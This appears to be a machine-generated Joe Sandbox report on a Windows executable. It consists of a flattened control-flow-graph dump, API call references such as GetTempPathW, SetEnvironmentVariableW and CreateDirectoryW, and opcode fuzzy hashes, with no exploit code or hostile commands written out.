7ff7acea30fc 15554->15587 15558 7ff7ace9d484 15559 7ff7ace9d4d9 15558->15559 15560 7ff7ace9d4a4 15558->15560 15563 7ff7ace9d488 15558->15563 15640 7ff7ace9cfc8 15559->15640 15636 7ff7ace9d284 
15560->15636 15563->15535 15565 7ff7acea30fc 38 API calls 15564->15565 15566 7ff7ace9d1f6 15565->15566 15567 7ff7acea2b44 37 API calls 15566->15567 15568 7ff7ace9d246 15567->15568 15569 7ff7ace9d24a 15568->15569 15570 7ff7ace9d284 45 API calls 15568->15570 15569->15535 15570->15569 15572 7ff7acea30fc 38 API calls 15571->15572 15573 7ff7ace9cf17 15572->15573 15574 7ff7acea2b44 37 API calls 15573->15574 15575 7ff7ace9cf6f 15574->15575 15576 7ff7ace9cf73 15575->15576 15577 7ff7ace9cfc8 45 API calls 15575->15577 15576->15535 15577->15576 15579 7ff7ace9cb79 15578->15579 15580 7ff7ace9cbac 15578->15580 15581 7ff7ace99c14 _invalid_parameter_noinfo 37 API calls 15579->15581 15582 7ff7ace9cbc4 15580->15582 15585 7ff7ace9cc45 15580->15585 15584 7ff7ace9cba5 memcpy_s 15581->15584 15583 7ff7ace9cecc 46 API calls 15582->15583 15583->15584 15584->15535 15585->15584 15586 7ff7ace93950 45 API calls 15585->15586 15586->15584 15588 7ff7acea314f fegetenv 15587->15588 15589 7ff7acea705c 37 API calls 15588->15589 15590 7ff7acea31a2 15589->15590 15591 7ff7acea3292 15590->15591 15596 7ff7acea31bd 15590->15596 15597 7ff7acea326c 15590->15597 15592 7ff7acea705c 37 API calls 15591->15592 15594 7ff7acea32bc 15592->15594 15593 7ff7acea31cf 15595 7ff7ace990dc __std_exception_copy 37 API calls 15593->15595 15598 7ff7acea705c 37 API calls 15594->15598 15599 7ff7acea324d 15595->15599 15596->15591 15596->15593 15600 7ff7ace990dc __std_exception_copy 37 API calls 15597->15600 15601 7ff7acea32cd 15598->15601 15602 7ff7acea4374 15599->15602 15606 7ff7acea3255 15599->15606 15600->15599 15604 7ff7acea7250 20 API calls 15601->15604 15603 7ff7ace99d00 _wfindfirst32i64 17 API calls 15602->15603 15605 7ff7acea4389 15603->15605 15614 7ff7acea3336 memcpy_s 15604->15614 15607 7ff7ace8acd0 _wfindfirst32i64 8 API calls 15606->15607 15608 7ff7ace9d429 15607->15608 15632 7ff7acea2b44 15608->15632 15609 7ff7acea36df memcpy_s 15610 7ff7acea3a1f 15612 7ff7acea2c60 37 API calls 15610->15612 15611 7ff7acea3377 
memcpy_s 15627 7ff7acea3cbb memcpy_s 15611->15627 15631 7ff7acea37d3 memcpy_s 15611->15631 15618 7ff7acea4137 15612->15618 15613 7ff7acea39cb 15613->15610 15615 7ff7acea438c memcpy_s 37 API calls 15613->15615 15614->15609 15614->15611 15616 7ff7ace94374 _get_daylight 11 API calls 15614->15616 15615->15610 15617 7ff7acea37b0 15616->15617 15619 7ff7ace99ce0 _invalid_parameter_noinfo 37 API calls 15617->15619 15621 7ff7acea438c memcpy_s 37 API calls 15618->15621 15625 7ff7acea4192 15618->15625 15619->15611 15620 7ff7acea4318 15624 7ff7acea705c 37 API calls 15620->15624 15621->15625 15622 7ff7ace94374 11 API calls _get_daylight 15622->15627 15623 7ff7ace94374 11 API calls _get_daylight 15623->15631 15624->15606 15625->15620 15626 7ff7acea2c60 37 API calls 15625->15626 15629 7ff7acea438c memcpy_s 37 API calls 15625->15629 15626->15625 15627->15610 15627->15613 15627->15622 15630 7ff7ace99ce0 37 API calls _invalid_parameter_noinfo 15627->15630 15628 7ff7ace99ce0 37 API calls _invalid_parameter_noinfo 15628->15631 15629->15625 15630->15627 15631->15613 15631->15623 15631->15628 15633 7ff7acea2b63 15632->15633 15634 7ff7ace99c14 _invalid_parameter_noinfo 37 API calls 15633->15634 15635 7ff7acea2b8e memcpy_s 15633->15635 15634->15635 15635->15558 15637 7ff7ace9d2b0 memcpy_s 15636->15637 15638 7ff7ace93950 45 API calls 15637->15638 15639 7ff7ace9d36a memcpy_s 15637->15639 15638->15639 15639->15563 15641 7ff7ace9d003 15640->15641 15644 7ff7ace9d050 memcpy_s 15640->15644 15642 7ff7ace99c14 _invalid_parameter_noinfo 37 API calls 15641->15642 15643 7ff7ace9d02f 15642->15643 15643->15563 15645 7ff7ace9d0bb 15644->15645 15647 7ff7ace93950 45 API calls 15644->15647 15646 7ff7ace990dc __std_exception_copy 37 API calls 15645->15646 15650 7ff7ace9d0fd memcpy_s 15646->15650 15647->15645 15648 7ff7ace99d00 _wfindfirst32i64 17 API calls 15649 7ff7ace9d1a8 15648->15649 15650->15648 15652 7ff7ace9f00c WideCharToMultiByte 15651->15652 15655 7ff7ace8fed1 15654->15655 15656 7ff7ace8fee3 
15654->15656 15658 7ff7ace94374 _get_daylight 11 API calls 15655->15658 15657 7ff7ace8ff2d 15656->15657 15659 7ff7ace8fef0 15656->15659 15663 7ff7ace94374 _get_daylight 11 API calls 15657->15663 15670 7ff7ace8ffd6 15657->15670 15660 7ff7ace8fed6 15658->15660 15662 7ff7ace99c14 _invalid_parameter_noinfo 37 API calls 15659->15662 15661 7ff7ace99ce0 _invalid_parameter_noinfo 37 API calls 15660->15661 15667 7ff7ace8fee1 15661->15667 15662->15667 15665 7ff7ace8ffcb 15663->15665 15664 7ff7ace94374 _get_daylight 11 API calls 15666 7ff7ace90080 15664->15666 15668 7ff7ace99ce0 _invalid_parameter_noinfo 37 API calls 15665->15668 15669 7ff7ace99ce0 _invalid_parameter_noinfo 37 API calls 15666->15669 15667->15394 15668->15670 15669->15667 15670->15664 15670->15667 15672 7ff7ace9caa9 15671->15672 15674 7ff7ace9398f 15671->15674 15672->15674 15679 7ff7acea2354 15672->15679 15675 7ff7ace9cafc 15674->15675 15676 7ff7ace9cb15 15675->15676 15677 7ff7ace9399f 15675->15677 15676->15677 15723 7ff7acea16c0 15676->15723 15677->15394 15691 7ff7ace9a550 GetLastError 15679->15691 15682 7ff7acea23ae 15682->15674 15692 7ff7ace9a591 FlsSetValue 15691->15692 15693 7ff7ace9a574 FlsGetValue 15691->15693 15695 7ff7ace9a5a3 15692->15695 15711 7ff7ace9a581 15692->15711 15694 7ff7ace9a58b 15693->15694 15693->15711 15694->15692 15697 7ff7ace9dc70 _get_daylight 11 API calls 15695->15697 15696 7ff7ace9a5fd SetLastError 15698 7ff7ace9a60a 15696->15698 15699 7ff7ace9a61d 15696->15699 15700 7ff7ace9a5b2 15697->15700 15698->15682 15713 7ff7ace9f6b8 EnterCriticalSection 15698->15713 15714 7ff7ace9913c 15699->15714 15702 7ff7ace9a5d0 FlsSetValue 15700->15702 15703 7ff7ace9a5c0 FlsSetValue 15700->15703 15704 7ff7ace9a5dc FlsSetValue 15702->15704 15705 7ff7ace9a5ee 15702->15705 15707 7ff7ace9a5c9 15703->15707 15704->15707 15708 7ff7ace9a2f4 _get_daylight 11 API calls 15705->15708 15709 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15707->15709 15710 7ff7ace9a5f6 15708->15710 
15709->15711 15712 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15710->15712 15711->15696 15712->15696 15715 7ff7acea26a0 __GetCurrentState EnterCriticalSection LeaveCriticalSection 15714->15715 15716 7ff7ace99145 15715->15716 15717 7ff7ace99154 15716->15717 15718 7ff7acea26f0 __GetCurrentState 44 API calls 15716->15718 15719 7ff7ace99187 __GetCurrentState 15717->15719 15720 7ff7ace9915d IsProcessorFeaturePresent 15717->15720 15718->15717 15721 7ff7ace9916c 15720->15721 15722 7ff7ace99a14 _wfindfirst32i64 14 API calls 15721->15722 15722->15719 15724 7ff7ace9a550 __GetCurrentState 45 API calls 15723->15724 15725 7ff7acea16c9 15724->15725 15733 7ff7ace9421c EnterCriticalSection 15726->15733 15735 7ff7ace824ec 15734->15735 15736 7ff7ace93b14 49 API calls 15735->15736 15737 7ff7ace8253f 15736->15737 15738 7ff7ace94374 _get_daylight 11 API calls 15737->15738 15739 7ff7ace82544 15738->15739 15753 7ff7ace94394 15739->15753 15742 7ff7ace81b30 49 API calls 15743 7ff7ace82573 memcpy_s 15742->15743 15744 7ff7ace879a0 57 API calls 15743->15744 15745 7ff7ace825a0 15744->15745 15746 7ff7ace825a5 15745->15746 15747 7ff7ace825df MessageBoxA 15745->15747 15748 7ff7ace879a0 57 API calls 15746->15748 15749 7ff7ace825f9 15747->15749 15750 7ff7ace825bf MessageBoxW 15748->15750 15751 7ff7ace8acd0 _wfindfirst32i64 8 API calls 15749->15751 15750->15749 15752 7ff7ace82609 15751->15752 15752->15022 15754 7ff7ace9a6c8 _get_daylight 11 API calls 15753->15754 15755 7ff7ace943ab 15754->15755 15756 7ff7ace8254b 15755->15756 15757 7ff7ace9dc70 _get_daylight 11 API calls 15755->15757 15759 7ff7ace943eb 15755->15759 15756->15742 15758 7ff7ace943e0 15757->15758 15760 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15758->15760 15759->15756 15765 7ff7ace9e348 15759->15765 15760->15759 15763 7ff7ace99d00 _wfindfirst32i64 17 API calls 15764 7ff7ace94430 15763->15764 15770 7ff7ace9e365 15765->15770 15766 7ff7ace9e36a 15767 7ff7ace94411 
15766->15767 15768 7ff7ace94374 _get_daylight 11 API calls 15766->15768 15767->15756 15767->15763 15769 7ff7ace9e374 15768->15769 15771 7ff7ace99ce0 _invalid_parameter_noinfo 37 API calls 15769->15771 15770->15766 15770->15767 15772 7ff7ace9e3b4 15770->15772 15771->15767 15772->15767 15773 7ff7ace94374 _get_daylight 11 API calls 15772->15773 15773->15769 15775 7ff7ace87ad4 WideCharToMultiByte 15774->15775 15776 7ff7ace87b42 WideCharToMultiByte 15774->15776 15777 7ff7ace87afe 15775->15777 15780 7ff7ace87b15 15775->15780 15778 7ff7ace87b6f 15776->15778 15782 7ff7ace83be5 15776->15782 15779 7ff7ace82620 57 API calls 15777->15779 15781 7ff7ace82620 57 API calls 15778->15781 15779->15782 15780->15776 15783 7ff7ace87b2b 15780->15783 15781->15782 15782->15032 15782->15033 15784 7ff7ace82620 57 API calls 15783->15784 15784->15782 15786 7ff7ace869ee 15785->15786 15787 7ff7ace99053 15785->15787 15786->15052 15787->15786 15788 7ff7ace990dc __std_exception_copy 37 API calls 15787->15788 15789 7ff7ace99080 15788->15789 15789->15786 15790 7ff7ace99d00 _wfindfirst32i64 17 API calls 15789->15790 15791 7ff7ace990b0 15790->15791 15793 7ff7ace817d4 15792->15793 15794 7ff7ace817e4 15792->15794 15795 7ff7ace83c90 116 API calls 15793->15795 15796 7ff7ace87170 83 API calls 15794->15796 15824 7ff7ace81842 15794->15824 15795->15794 15797 7ff7ace81815 15796->15797 15797->15824 15826 7ff7ace8f864 15797->15826 15799 7ff7ace8acd0 _wfindfirst32i64 8 API calls 15801 7ff7ace819c0 15799->15801 15800 7ff7ace8182b 15802 7ff7ace8184c 15800->15802 15803 7ff7ace8182f 15800->15803 15801->15067 15801->15068 15830 7ff7ace8f52c 15802->15830 15804 7ff7ace824d0 59 API calls 15803->15804 15804->15824 15807 7ff7ace8f864 73 API calls 15809 7ff7ace818d1 15807->15809 15808 7ff7ace824d0 59 API calls 15808->15824 15810 7ff7ace818fe 15809->15810 15811 7ff7ace818e3 15809->15811 15813 7ff7ace8f52c _fread_nolock 53 API calls 15810->15813 15812 7ff7ace824d0 59 API calls 15811->15812 15812->15824 15814 7ff7ace81913 
15813->15814 15815 7ff7ace81867 15814->15815 15816 7ff7ace81925 15814->15816 15815->15808 15833 7ff7ace8f2a0 15816->15833 15819 7ff7ace8193d 15820 7ff7ace82770 59 API calls 15819->15820 15820->15824 15821 7ff7ace81993 15823 7ff7ace8f1dc 74 API calls 15821->15823 15821->15824 15822 7ff7ace81950 15822->15821 15825 7ff7ace82770 59 API calls 15822->15825 15823->15824 15824->15799 15825->15821 15827 7ff7ace8f894 15826->15827 15839 7ff7ace8f5f4 15827->15839 15829 7ff7ace8f8ad 15829->15800 15851 7ff7ace8f54c 15830->15851 15834 7ff7ace8f2a9 15833->15834 15835 7ff7ace81939 15833->15835 15836 7ff7ace94374 _get_daylight 11 API calls 15834->15836 15835->15819 15835->15822 15837 7ff7ace8f2ae 15836->15837 15838 7ff7ace99ce0 _invalid_parameter_noinfo 37 API calls 15837->15838 15838->15835 15840 7ff7ace8f65e 15839->15840 15841 7ff7ace8f61e 15839->15841 15840->15841 15843 7ff7ace8f66a 15840->15843 15842 7ff7ace99c14 _invalid_parameter_noinfo 37 API calls 15841->15842 15844 7ff7ace8f645 15842->15844 15850 7ff7ace9421c EnterCriticalSection 15843->15850 15844->15829 15852 7ff7ace8f576 15851->15852 15863 7ff7ace81861 15851->15863 15853 7ff7ace8f5c2 15852->15853 15855 7ff7ace8f585 memcpy_s 15852->15855 15852->15863 15864 7ff7ace9421c EnterCriticalSection 15853->15864 15857 7ff7ace94374 _get_daylight 11 API calls 15855->15857 15858 7ff7ace8f59a 15857->15858 15860 7ff7ace99ce0 _invalid_parameter_noinfo 37 API calls 15858->15860 15860->15863 15863->15807 15863->15815 15957 7ff7ace86700 15865->15957 15867 7ff7ace81454 15868 7ff7ace81459 15867->15868 15966 7ff7ace86a20 15867->15966 15868->15092 15871 7ff7ace814a7 15873 7ff7ace814e0 15871->15873 15875 7ff7ace83c90 116 API calls 15871->15875 15872 7ff7ace81487 15874 7ff7ace824d0 59 API calls 15872->15874 15876 7ff7ace8f864 73 API calls 15873->15876 15877 7ff7ace8149d 15874->15877 15878 7ff7ace814bf 15875->15878 15879 7ff7ace814f2 15876->15879 15877->15092 15878->15873 15880 7ff7ace814c7 15878->15880 15881 7ff7ace81516 15879->15881 15882 
7ff7ace814f6 15879->15882 15883 7ff7ace82770 59 API calls 15880->15883 15885 7ff7ace8151c 15881->15885 15886 7ff7ace81534 15881->15886 15884 7ff7ace824d0 59 API calls 15882->15884 15898 7ff7ace814d6 __std_exception_copy 15883->15898 15884->15898 15986 7ff7ace81050 15885->15986 15888 7ff7ace81556 15886->15888 15889 7ff7ace81575 15886->15889 15891 7ff7ace824d0 59 API calls 15888->15891 15894 7ff7ace8f52c _fread_nolock 53 API calls 15889->15894 15895 7ff7ace815d5 15889->15895 15889->15898 16004 7ff7ace8fc6c 15889->16004 15890 7ff7ace81624 15893 7ff7ace8f1dc 74 API calls 15890->15893 15891->15898 15892 7ff7ace8f1dc 74 API calls 15892->15890 15893->15877 15894->15889 15897 7ff7ace824d0 59 API calls 15895->15897 15897->15898 15898->15890 15898->15892 15900 7ff7ace829a6 15899->15900 15901 7ff7ace81b30 49 API calls 15900->15901 15903 7ff7ace829db 15901->15903 15902 7ff7ace82dc9 15903->15902 15904 7ff7ace83b00 49 API calls 15903->15904 15905 7ff7ace82a57 15904->15905 16583 7ff7ace82ff0 15905->16583 15908 7ff7ace82ae7 15909 7ff7ace86700 98 API calls 15908->15909 15911 7ff7ace82aef 15909->15911 15910 7ff7ace82ff0 75 API calls 15912 7ff7ace82ae3 15910->15912 15914 7ff7ace82b0c 15911->15914 16591 7ff7ace865e0 15911->16591 15912->15908 15913 7ff7ace82b55 15912->15913 15916 7ff7ace82ff0 75 API calls 15913->15916 15917 7ff7ace82770 59 API calls 15914->15917 15952 7ff7ace82b26 15914->15952 15918 7ff7ace82b7e 15916->15918 15917->15952 15919 7ff7ace82bd8 15918->15919 15920 7ff7ace82ff0 75 API calls 15918->15920 15919->15914 15921 7ff7ace86700 98 API calls 15919->15921 15922 7ff7ace82bab 15920->15922 15927 7ff7ace82be8 15921->15927 15922->15919 15925 7ff7ace82ff0 75 API calls 15922->15925 15923 7ff7ace8acd0 _wfindfirst32i64 8 API calls 15924 7ff7ace82b4a 15923->15924 15924->15092 15925->15919 15926 7ff7ace81af0 59 API calls 15928 7ff7ace82c3f 15926->15928 15927->15914 15927->15926 15930 7ff7ace82d06 15927->15930 15928->15914 15929 7ff7ace81b30 49 API calls 15928->15929 15931 
7ff7ace82c67 15929->15931 15930->15914 15943 7ff7ace82d1e 15930->15943 15932 7ff7ace82da2 15931->15932 15933 7ff7ace81b30 49 API calls 15931->15933 15934 7ff7ace82770 59 API calls 15932->15934 15935 7ff7ace82c94 15933->15935 15936 7ff7ace82d01 15934->15936 15935->15932 15938 7ff7ace81b30 49 API calls 15935->15938 15937 7ff7ace81ab0 74 API calls 15936->15937 15937->15914 15939 7ff7ace82cc1 15938->15939 15939->15932 15942 7ff7ace82ccc 15939->15942 15940 7ff7ace81440 161 API calls 15940->15943 15941 7ff7ace81780 59 API calls 15941->15943 15943->15940 15943->15941 15945 7ff7ace82d84 15943->15945 15943->15952 15946 7ff7ace82770 59 API calls 15945->15946 15948 7ff7ace82d95 15946->15948 15951 7ff7ace81ab0 74 API calls 15948->15951 15951->15952 15952->15923 15954 7ff7ace817a1 15953->15954 15955 7ff7ace81795 15953->15955 15954->15092 15956 7ff7ace82770 59 API calls 15955->15956 15956->15954 15958 7ff7ace86712 15957->15958 15963 7ff7ace86748 15957->15963 16008 7ff7ace816d0 15958->16008 15963->15867 15964 7ff7ace82770 59 API calls 15965 7ff7ace8673d 15964->15965 15965->15867 15967 7ff7ace86a30 15966->15967 15968 7ff7ace81b30 49 API calls 15967->15968 15969 7ff7ace86a61 15968->15969 15970 7ff7ace81b30 49 API calls 15969->15970 15981 7ff7ace86be9 15969->15981 15973 7ff7ace86a88 15970->15973 15971 7ff7ace8acd0 _wfindfirst32i64 8 API calls 15972 7ff7ace8147f 15971->15972 15972->15871 15972->15872 15973->15981 16533 7ff7ace95018 15973->16533 15975 7ff7ace86b99 15976 7ff7ace879a0 57 API calls 15975->15976 15978 7ff7ace86bb1 15976->15978 15977 7ff7ace86bd8 15980 7ff7ace83c90 116 API calls 15977->15980 15978->15977 16542 7ff7ace82880 15978->16542 15980->15981 15981->15971 15982 7ff7ace95018 49 API calls 15984 7ff7ace86abd 15982->15984 15983 7ff7ace879a0 57 API calls 15983->15984 15984->15975 15984->15981 15984->15982 15984->15983 15985 7ff7ace87810 58 API calls 15984->15985 15985->15984 15987 7ff7ace810a6 15986->15987 15988 7ff7ace810ad 15987->15988 15989 7ff7ace810d3 15987->15989 
15990 7ff7ace82770 59 API calls 15988->15990 15992 7ff7ace810ed 15989->15992 15993 7ff7ace81109 15989->15993 15991 7ff7ace810c0 15990->15991 15991->15898 15994 7ff7ace824d0 59 API calls 15992->15994 15995 7ff7ace8111b 15993->15995 16002 7ff7ace81137 memcpy_s 15993->16002 15998 7ff7ace81104 __std_exception_copy 15994->15998 15996 7ff7ace824d0 59 API calls 15995->15996 15996->15998 15997 7ff7ace8f52c _fread_nolock 53 API calls 15997->16002 15998->15898 15999 7ff7ace811fe 16000 7ff7ace82770 59 API calls 15999->16000 16000->15998 16001 7ff7ace8fc6c 76 API calls 16001->16002 16002->15997 16002->15998 16002->15999 16002->16001 16003 7ff7ace8f2a0 37 API calls 16002->16003 16003->16002 16005 7ff7ace8fc9c 16004->16005 16568 7ff7ace8f9bc 16005->16568 16007 7ff7ace8fcba 16007->15889 16010 7ff7ace816f5 16008->16010 16009 7ff7ace81738 16012 7ff7ace86760 16009->16012 16010->16009 16011 7ff7ace82770 59 API calls 16010->16011 16011->16009 16013 7ff7ace86778 16012->16013 16014 7ff7ace867eb 16013->16014 16015 7ff7ace86798 16013->16015 16016 7ff7ace867f0 GetTempPathW 16014->16016 16017 7ff7ace86970 61 API calls 16015->16017 16018 7ff7ace86805 16016->16018 16019 7ff7ace867a4 16017->16019 16052 7ff7ace82470 16018->16052 16076 7ff7ace86460 16019->16076 16024 7ff7ace8acd0 _wfindfirst32i64 8 API calls 16027 7ff7ace8672d 16024->16027 16026 7ff7ace867ca __std_exception_copy 16026->16016 16029 7ff7ace867d8 16026->16029 16027->15963 16027->15964 16030 7ff7ace82770 59 API calls 16029->16030 16033 7ff7ace867e4 16030->16033 16031 7ff7ace868c6 16034 7ff7ace87ab0 59 API calls 16031->16034 16032 7ff7ace8681e __std_exception_copy 16032->16031 16035 7ff7ace86851 16032->16035 16056 7ff7ace9729c 16032->16056 16059 7ff7ace87810 16032->16059 16046 7ff7ace8688a __std_exception_copy 16033->16046 16037 7ff7ace868d7 __std_exception_copy 16034->16037 16036 7ff7ace879a0 57 API calls 16035->16036 16035->16046 16038 7ff7ace86867 16036->16038 16039 7ff7ace879a0 57 API calls 16037->16039 16037->16046 16040 
7ff7ace8686c 16038->16040 16041 7ff7ace868a9 SetEnvironmentVariableW 16038->16041 16042 7ff7ace868f5 16039->16042 16043 7ff7ace879a0 57 API calls 16040->16043 16041->16046 16044 7ff7ace8692d SetEnvironmentVariableW 16042->16044 16045 7ff7ace868fa 16042->16045 16047 7ff7ace8687c 16043->16047 16044->16046 16048 7ff7ace879a0 57 API calls 16045->16048 16046->16024 16049 7ff7ace965e4 38 API calls 16047->16049 16050 7ff7ace8690a 16048->16050 16049->16046 16051 7ff7ace965e4 38 API calls 16050->16051 16051->16046 16053 7ff7ace82495 16052->16053 16110 7ff7ace93d68 16053->16110 16282 7ff7ace96ec8 16056->16282 16060 7ff7ace8ad00 16059->16060 16061 7ff7ace87820 GetCurrentProcess OpenProcessToken 16060->16061 16062 7ff7ace8786b GetTokenInformation 16061->16062 16063 7ff7ace878e1 __std_exception_copy 16061->16063 16064 7ff7ace8788d GetLastError 16062->16064 16065 7ff7ace87898 16062->16065 16066 7ff7ace878fa 16063->16066 16067 7ff7ace878f4 CloseHandle 16063->16067 16064->16063 16064->16065 16065->16063 16069 7ff7ace878ae GetTokenInformation 16065->16069 16413 7ff7ace87510 16066->16413 16067->16066 16069->16063 16071 7ff7ace878d4 ConvertSidToStringSidW 16069->16071 16071->16063 16077 7ff7ace8646c 16076->16077 16078 7ff7ace879a0 57 API calls 16077->16078 16079 7ff7ace8648e 16078->16079 16080 7ff7ace864a9 ExpandEnvironmentStringsW 16079->16080 16081 7ff7ace86496 16079->16081 16083 7ff7ace864cf __std_exception_copy 16080->16083 16082 7ff7ace82770 59 API calls 16081->16082 16088 7ff7ace864a2 16082->16088 16084 7ff7ace864e6 16083->16084 16085 7ff7ace864d3 16083->16085 16090 7ff7ace864f4 16084->16090 16091 7ff7ace86500 16084->16091 16086 7ff7ace82770 59 API calls 16085->16086 16086->16088 16087 7ff7ace8acd0 _wfindfirst32i64 8 API calls 16089 7ff7ace865c8 16087->16089 16088->16087 16089->16046 16100 7ff7ace965e4 16089->16100 16417 7ff7ace95e74 16090->16417 16424 7ff7ace95278 16091->16424 16094 7ff7ace864fe 16095 7ff7ace8651a 16094->16095 16098 7ff7ace8652d memcpy_s 16094->16098 16096 
7ff7ace82770 59 API calls 16095->16096 16096->16088 16097 7ff7ace865a2 CreateDirectoryW 16097->16088 16098->16097 16099 7ff7ace8657c CreateDirectoryW 16098->16099 16099->16098 16101 7ff7ace965f1 16100->16101 16102 7ff7ace96604 16100->16102 16104 7ff7ace94374 _get_daylight 11 API calls 16101->16104 16525 7ff7ace96268 16102->16525 16106 7ff7ace965f6 16104->16106 16107 7ff7ace99ce0 _invalid_parameter_noinfo 37 API calls 16106->16107 16109 7ff7ace96602 16107->16109 16109->16026 16112 7ff7ace93dc2 16110->16112 16111 7ff7ace93de7 16113 7ff7ace99c14 _invalid_parameter_noinfo 37 API calls 16111->16113 16112->16111 16114 7ff7ace93e23 16112->16114 16116 7ff7ace93e11 16113->16116 16128 7ff7ace92120 16114->16128 16118 7ff7ace8acd0 _wfindfirst32i64 8 API calls 16116->16118 16120 7ff7ace824b4 16118->16120 16119 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16119->16116 16120->16032 16121 7ff7ace93f04 16121->16119 16122 7ff7ace93ed9 16125 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16122->16125 16123 7ff7ace93f2a 16123->16121 16124 7ff7ace93f34 16123->16124 16127 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16124->16127 16125->16116 16126 7ff7ace93ed0 16126->16121 16126->16122 16127->16116 16129 7ff7ace9215e 16128->16129 16130 7ff7ace9214e 16128->16130 16131 7ff7ace92167 16129->16131 16137 7ff7ace92195 16129->16137 16132 7ff7ace99c14 _invalid_parameter_noinfo 37 API calls 16130->16132 16133 7ff7ace99c14 _invalid_parameter_noinfo 37 API calls 16131->16133 16134 7ff7ace9218d 16132->16134 16133->16134 16134->16121 16134->16122 16134->16123 16134->16126 16137->16130 16137->16134 16139 7ff7ace92b34 16137->16139 16172 7ff7ace92580 16137->16172 16209 7ff7ace91d10 16137->16209 16140 7ff7ace92b76 16139->16140 16141 7ff7ace92be7 16139->16141 16142 7ff7ace92c11 16140->16142 16143 7ff7ace92b7c 16140->16143 16144 7ff7ace92c40 16141->16144 16145 7ff7ace92bec 16141->16145 16228 7ff7ace90ee4 16142->16228 

Control-flow Graph

Legend: Executed / Not Executed
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF7ACEA4D95
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACEA46E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ACEA46FC
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE99D48: RtlFreeHeap.NTDLL(?,?,?,00007FF7ACEA1D72,?,?,?,00007FF7ACEA1DAF,?,?,00000000,00007FF7ACEA2275,?,?,?,00007FF7ACEA21A7), ref: 00007FF7ACE99D5E
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE99D48: GetLastError.KERNEL32(?,?,?,00007FF7ACEA1D72,?,?,?,00007FF7ACEA1DAF,?,?,00000000,00007FF7ACEA2275,?,?,?,00007FF7ACEA21A7), ref: 00007FF7ACE99D68
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE99D00: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7ACE99CDF,?,?,?,?,?,00007FF7ACE9211C), ref: 00007FF7ACE99D09
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE99D00: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7ACE99CDF,?,?,?,?,?,00007FF7ACE9211C), ref: 00007FF7ACE99D2E
                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF7ACEA4D84
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACEA4748: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ACEA475C
                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF7ACEA4FFA
                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF7ACEA500B
                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF7ACEA501C
                                                                                                                                                                                                            • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7ACEA525C), ref: 00007FF7ACEA5043
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
• Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                            • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                            • API String ID: 4070488512-239921721
                                                                                                                                                                                                            • Opcode ID: 3cbab8ded4b22c9ecff02dc7d03bcb7a7c6bdc9119315e29a6b66e941e77c5ab
                                                                                                                                                                                                            • Instruction ID: cc3d5d07ba566296964640fa477d9531a66c568089070c5d1f02e8e399f8538d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3cbab8ded4b22c9ecff02dc7d03bcb7a7c6bdc9119315e29a6b66e941e77c5ab
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0BD1F576A0E642AAEB20FF21D4811B9E791FF84785FCA9035EA0D576A5DF3CE441C360

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1617910340-0
                                                                                                                                                                                                            • Opcode ID: 632e748b839932f5b00ec5f176d5a067dee1d4c4f3157cbf34afbb6f699b0397
                                                                                                                                                                                                            • Instruction ID: aa2eed03ff51c4924e06a66f0e0230fac6009a17ca9d9430a36da21129a4c5d1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 632e748b839932f5b00ec5f176d5a067dee1d4c4f3157cbf34afbb6f699b0397
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D3C1E276B2EA4199EB10EF65C4802BD7761FB49B98B864235DF2E673A4CF38D055C310

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetTempPathW.KERNEL32(?,00000000,?,00007FF7ACE8672D), ref: 00007FF7ACE867FA
